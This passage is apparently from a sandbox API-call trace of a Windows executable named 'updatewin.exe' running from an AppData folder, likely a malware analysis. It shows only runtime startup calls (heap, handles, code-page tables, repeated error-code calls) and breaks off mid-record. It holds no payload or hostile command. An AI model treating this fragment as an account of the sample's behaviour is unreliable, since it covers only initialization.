cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0080.527] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x800) returned 0x1fd09f0 [0080.527] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0080.527] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.527] SetHandleCount (uNumber=0x20) returned 0x20 [0080.527] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe\" " [0080.527] GetEnvironmentStringsW () returned 0x614e60* [0080.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0080.528] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x565) returned 0x1fd11f8 [0080.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1fd11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0080.528] FreeEnvironmentStringsW (penv=0x614e60) returned 1 [0080.528] GetLastError () returned 0x0 [0080.528] SetLastError (dwErrCode=0x0) [0080.528] GetLastError () returned 0x0 [0080.528] SetLastError (dwErrCode=0x0) [0080.528] GetLastError () returned 0x0 [0080.528] SetLastError (dwErrCode=0x0) [0080.528] GetACP () returned 0x4e4 [0080.528] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x220) returned 0x1fd1768 [0080.528] GetLastError () returned 0x0 [0080.529] SetLastError (dwErrCode=0x0) [0080.529] IsValidCodePage (CodePage=0x4e4) returned 1 [0080.529] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0080.529] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0080.529] GetLastError () returned 0x0 [0080.529] SetLastError (dwErrCode=0x0) [0080.529] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0080.529] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.529] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0080.529] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0080.529] GetLastError () returned 0x0 [0080.529] SetLastError (dwErrCode=0x0) [0080.529] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0080.529] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.529] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ罽묂㞥AĀ") returned 256 [0080.530] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ罽묂㞥AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0080.530] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ罽묂㞥AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0080.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿã\x0c\x92¸\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0080.530] GetLastError () returned 0x0 [0080.530] SetLastError (dwErrCode=0x0) [0080.530] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.530] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ罽묂㞥AĀ") returned 256 [0080.530] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ罽묂㞥AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0080.530] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ罽묂㞥AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0080.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿã\x0c\x92¸\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0080.530] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43b480, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe")) returned 0x5e [0080.530] GetLastError () returned 0x0 [0080.531] SetLastError (dwErrCode=0x0) [0080.531] GetLastError () returned 0x0 [0080.531] SetLastError (dwErrCode=0x0) [0080.531] GetLastError () returned 0x0 [0080.531] SetLastError (dwErrCode=0x0) [0080.531] GetLastError () returned 0x0 [0080.531] SetLastError (dwErrCode=0x0) [0080.531] GetLastError () returned 0x0 [0080.531] SetLastError (dwErrCode=0x0) [0080.531] GetLastError () returned 0x0 [0080.531] SetLastError (dwErrCode=0x0) [0080.531] GetLastError () returned 0x0 [0080.531] SetLastError (dwErrCode=0x0) [0080.531] GetLastError () returned 0x0 [0080.531] SetLastError (dwErrCode=0x0) [0080.532] GetLastError () returned 0x0 [0080.532] SetLastError (dwErrCode=0x0) [0080.532] GetLastError () returned 0x0 [0080.532] SetLastError (dwErrCode=0x0) [0080.532] GetLastError () returned 0x0 [0080.532] SetLastError (dwErrCode=0x0) [0080.532] GetLastError () returned 0x0 [0080.532] SetLastError (dwErrCode=0x0) [0080.532] GetLastError () returned 0x0 [0080.532] SetLastError (dwErrCode=0x0) [0080.532] GetLastError () returned 0x0 [0080.532] SetLastError (dwErrCode=0x0) [0080.532] GetLastError () returned 0x0 [0080.532] SetLastError (dwErrCode=0x0) [0080.532] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.533] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.533] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.533] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.533] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.533] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.533] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.533] GetLastError () returned 0x0 [0080.533] SetLastError (dwErrCode=0x0) [0080.534] GetLastError () returned 0x0 [0080.534] SetLastError (dwErrCode=0x0) [0080.534] GetLastError () returned 0x0 [0080.534] SetLastError (dwErrCode=0x0) [0080.534] GetLastError () returned 0x0 [0080.534] SetLastError (dwErrCode=0x0) [0080.534] GetLastError () returned 0x0 [0080.534] SetLastError (dwErrCode=0x0) [0080.534] GetLastError () returned 0x0 [0080.534] SetLastError (dwErrCode=0x0) [0080.534] GetLastError () returned 0x0 [0080.535] SetLastError (dwErrCode=0x0) [0080.535] GetLastError () returned 0x0 [0080.535] SetLastError (dwErrCode=0x0) [0080.535] GetLastError () returned 0x0 [0080.535] SetLastError (dwErrCode=0x0) [0080.535] GetLastError () returned 0x0 [0080.535] SetLastError (dwErrCode=0x0) [0080.536] GetLastError () returned 0x0 [0080.536] SetLastError (dwErrCode=0x0) [0080.536] GetLastError () returned 0x0 [0080.536] SetLastError (dwErrCode=0x0) [0080.536] GetLastError () returned 0x0 [0080.536] SetLastError (dwErrCode=0x0) [0080.536] GetLastError () returned 0x0 [0080.536] SetLastError (dwErrCode=0x0) [0080.536] GetLastError () returned 0x0 [0080.536] SetLastError (dwErrCode=0x0) [0080.536] GetLastError () returned 0x0 [0080.536] SetLastError (dwErrCode=0x0) [0080.536] GetLastError () returned 0x0 [0080.536] SetLastError (dwErrCode=0x0) [0080.536] GetLastError () returned 0x0 [0080.537] SetLastError (dwErrCode=0x0) [0080.537] GetLastError () returned 0x0 [0080.537] SetLastError (dwErrCode=0x0) [0080.537] GetLastError () returned 0x0 [0080.537] SetLastError (dwErrCode=0x0) [0080.537] GetLastError () returned 0x0 [0080.537] SetLastError (dwErrCode=0x0) [0080.537] GetLastError () returned 0x0 [0080.537] SetLastError (dwErrCode=0x0) [0080.537] GetLastError () returned 0x0 [0080.537] SetLastError (dwErrCode=0x0) [0080.537] GetLastError () returned 0x0 [0080.538] SetLastError (dwErrCode=0x0) [0080.538] GetLastError () returned 0x0 [0080.538] SetLastError (dwErrCode=0x0) [0080.538] GetLastError () returned 0x0 [0080.538] SetLastError (dwErrCode=0x0) [0080.538] GetLastError () returned 0x0 [0080.538] SetLastError (dwErrCode=0x0) [0080.538] GetLastError () returned 0x0 [0080.538] SetLastError (dwErrCode=0x0) [0080.538] GetLastError () returned 0x0 [0080.538] SetLastError (dwErrCode=0x0) [0080.538] GetLastError () returned 0x0 [0080.538] SetLastError (dwErrCode=0x0) [0080.538] GetLastError () returned 0x0 [0080.539] SetLastError (dwErrCode=0x0) [0080.539] GetLastError () returned 0x0 [0080.539] SetLastError (dwErrCode=0x0) [0080.539] GetLastError () returned 0x0 [0080.539] SetLastError (dwErrCode=0x0) [0080.539] GetLastError () returned 0x0 [0080.539] SetLastError (dwErrCode=0x0) [0080.539] GetLastError () returned 0x0 [0080.539] SetLastError (dwErrCode=0x0) [0080.539] GetLastError () returned 0x0 [0080.539] SetLastError (dwErrCode=0x0) [0080.539] GetLastError () returned 0x0 [0080.539] SetLastError (dwErrCode=0x0) [0080.539] GetLastError () returned 0x0 [0080.540] SetLastError (dwErrCode=0x0) [0080.540] GetLastError () returned 0x0 [0080.540] SetLastError (dwErrCode=0x0) [0080.540] GetLastError () returned 0x0 [0080.540] SetLastError (dwErrCode=0x0) [0080.540] GetLastError () returned 0x0 [0080.540] SetLastError (dwErrCode=0x0) [0080.540] GetLastError () returned 0x0 [0080.540] SetLastError (dwErrCode=0x0) [0080.540] GetLastError () returned 0x0 [0080.540] SetLastError (dwErrCode=0x0) [0080.540] GetLastError () returned 0x0 [0080.540] SetLastError (dwErrCode=0x0) [0080.540] GetLastError () returned 0x0 [0080.540] SetLastError (dwErrCode=0x0) [0080.541] GetLastError () returned 0x0 [0080.541] SetLastError (dwErrCode=0x0) [0080.541] GetLastError () returned 0x0 [0080.541] SetLastError (dwErrCode=0x0) [0080.541] GetLastError () returned 0x0 [0080.541] SetLastError (dwErrCode=0x0) [0080.541] GetLastError () returned 0x0 [0080.541] SetLastError (dwErrCode=0x0) [0080.541] GetLastError () returned 0x0 [0080.541] SetLastError (dwErrCode=0x0) [0080.541] GetLastError () returned 0x0 [0080.541] SetLastError (dwErrCode=0x0) [0080.541] GetLastError () returned 0x0 [0080.541] SetLastError (dwErrCode=0x0) [0080.542] GetLastError () returned 0x0 [0080.542] SetLastError (dwErrCode=0x0) [0080.542] GetLastError () returned 0x0 [0080.542] SetLastError (dwErrCode=0x0) [0080.542] GetLastError () returned 0x0 [0080.542] SetLastError (dwErrCode=0x0) [0080.542] GetLastError () returned 0x0 [0080.542] SetLastError (dwErrCode=0x0) [0080.542] GetLastError () returned 0x0 [0080.542] SetLastError (dwErrCode=0x0) [0080.542] GetLastError () returned 0x0 [0080.542] SetLastError (dwErrCode=0x0) [0080.542] GetLastError () returned 0x0 [0080.542] SetLastError (dwErrCode=0x0) [0080.543] GetLastError () returned 0x0 [0080.543] SetLastError (dwErrCode=0x0) [0080.543] GetLastError () returned 0x0 [0080.543] SetLastError (dwErrCode=0x0) [0080.543] GetLastError () returned 0x0 [0080.543] SetLastError (dwErrCode=0x0) [0080.543] GetLastError () returned 0x0 [0080.543] SetLastError (dwErrCode=0x0) [0080.543] GetLastError () returned 0x0 [0080.543] SetLastError (dwErrCode=0x0) [0080.543] GetLastError () returned 0x0 [0080.543] SetLastError (dwErrCode=0x0) [0080.543] GetLastError () returned 0x0 [0080.543] SetLastError (dwErrCode=0x0) [0080.543] GetLastError () returned 0x0 [0080.544] SetLastError (dwErrCode=0x0) [0080.544] GetLastError () returned 0x0 [0080.544] SetLastError (dwErrCode=0x0) [0080.544] GetLastError () returned 0x0 [0080.544] SetLastError (dwErrCode=0x0) [0080.544] GetLastError () returned 0x0 [0080.544] SetLastError (dwErrCode=0x0) [0080.544] GetLastError () returned 0x0 [0080.544] SetLastError (dwErrCode=0x0) [0080.544] GetLastError () returned 0x0 [0080.544] SetLastError (dwErrCode=0x0) [0080.544] GetLastError () returned 0x0 [0080.545] SetLastError (dwErrCode=0x0) [0080.545] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x67) returned 0x1fd1990 [0080.545] GetLastError () returned 0x0 [0080.545] SetLastError (dwErrCode=0x0) [0080.545] GetLastError () returned 0x0 [0080.545] SetLastError (dwErrCode=0x0) [0080.545] GetLastError () returned 0x0 [0080.545] SetLastError (dwErrCode=0x0) [0080.545] GetLastError () returned 0x0 [0080.545] SetLastError (dwErrCode=0x0) [0080.545] GetLastError () returned 0x0 [0080.545] SetLastError (dwErrCode=0x0) [0080.545] GetLastError () returned 0x0 [0080.545] SetLastError (dwErrCode=0x0) [0080.545] GetLastError () returned 0x0 [0080.546] SetLastError (dwErrCode=0x0) [0080.546] GetLastError () returned 0x0 [0080.546] SetLastError (dwErrCode=0x0) [0080.546] GetLastError () returned 0x0 [0080.546] SetLastError (dwErrCode=0x0) [0080.546] GetLastError () returned 0x0 [0080.546] SetLastError (dwErrCode=0x0) [0080.546] GetLastError () returned 0x0 [0080.546] SetLastError (dwErrCode=0x0) [0080.546] GetLastError () returned 0x0 [0080.546] SetLastError (dwErrCode=0x0) [0080.546] GetLastError () returned 0x0 [0080.546] SetLastError (dwErrCode=0x0) [0080.546] GetLastError () returned 0x0 [0080.546] SetLastError (dwErrCode=0x0) [0080.547] GetLastError () returned 0x0 [0080.547] SetLastError (dwErrCode=0x0) [0080.547] GetLastError () returned 0x0 [0080.547] SetLastError (dwErrCode=0x0) [0080.547] GetLastError () returned 0x0 [0080.547] SetLastError (dwErrCode=0x0) [0080.547] GetLastError () returned 0x0 [0080.547] 